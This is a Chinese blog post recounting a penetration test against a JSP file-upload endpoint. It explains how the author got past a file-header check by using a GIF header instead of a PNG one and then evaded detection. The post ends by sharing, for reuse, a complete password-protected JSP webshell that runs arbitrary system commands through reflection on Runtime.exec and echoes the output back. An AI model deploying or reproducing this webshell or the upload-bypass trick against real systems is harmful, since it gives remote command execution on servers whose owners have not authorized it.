当前位置:   article > 正文

渗透实战-JSP上传webshell报错500_渗透报版本错误

渗透报版本错误

从毕业到现在接近3年了,也是终于迈出了跳槽的一步,本身不是很想跳槽,但是各种原因吧,还是跟上家公司说拜拜了,呆了2年多,进步了很多,感谢上家提供的平台,这篇故事发生在我入职新公司的第一天,上家公司我的一位组员,找到我,感觉这个可以学习一下,主要是一个渗透思路问题。

懒得打字了,上传的地方就大约是这个情况 ,看聊天聊天记录吧,大概就是可以上传webshell,但是报错

 

 

 下班后回家做了一顿饭,因为是跟xe合租的房子,他对象出去有事,只能我亲自下厨,因为是刚搬过来,没有锅盖,直接起锅烧油,洗菜盆子一盖

 味道可以,给我自己厨艺打个满分

吃完饭后我就打开电脑测试了一下,确实是检测文件头,

没有文件头就直接200.返回包什么东西都没有,带

文件头成功上传,并且返回上传路径 

 访问webshell 500,这里的500并不是冰蝎马那种500,因为我上传的是123456,本身并不应该报错

然后我换了一下JSPX 还是报错,提示空指针,不是马的问题

后来回看jsp的报错信息,仔细看发现报错原因居然是因为我们的图片马的文件头

 

具体是因为我们的png文件头不是UTF-8编码,但是删掉文件头又上传不上去,

 

一直在寻找躲避这个错误的方法,后来一想,gif的文件头可以是纯UTF-8编码的,测试一下传了个马正常上传

访问一下webshell看看还报错吗,无情,直接给我来了一句网络安全为人民,网络安全靠人民

转战免杀马继续测试,成功上传并且执行命令

最后分享一下免杀的cmd马

  1. <%@ page language="java" pageEncoding="UTF-8" %>
  2. <%
  3. // 加入一个密码
  4. String PASSWORD = "password";
  5. String passwd = request.getParameter("pwd");
  6. String cmd = request.getParameter("cmd");
  7. if (!passwd.equals(PASSWORD)) {
  8. return;
  9. }
  10. // 反射调用
  11. Class rt = Class.forName("java.lang.Runtime");
  12. java.lang.reflect.Method gr = rt.getMethod("getRuntime");
  13. java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
  14. Process process = (Process) ex.invoke(gr.invoke(null), cmd);
  15. // 类似上文做回显
  16. java.io.InputStream in = process.getInputStream();
  17. out.print("<pre>");
  18. java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
  19. java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
  20. String s = null;
  21. while ((s = stdInput.readLine()) != null) {
  22. out.println(s);
  23. }
  24. out.print("</pre>");
  25. %>

 还是那句话,代码是人写的,规则也是人配置的,渗透最重要的就是思路,好的思路会让你成长的更快

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/623634
推荐阅读
相关标签
  

闽ICP备14008679号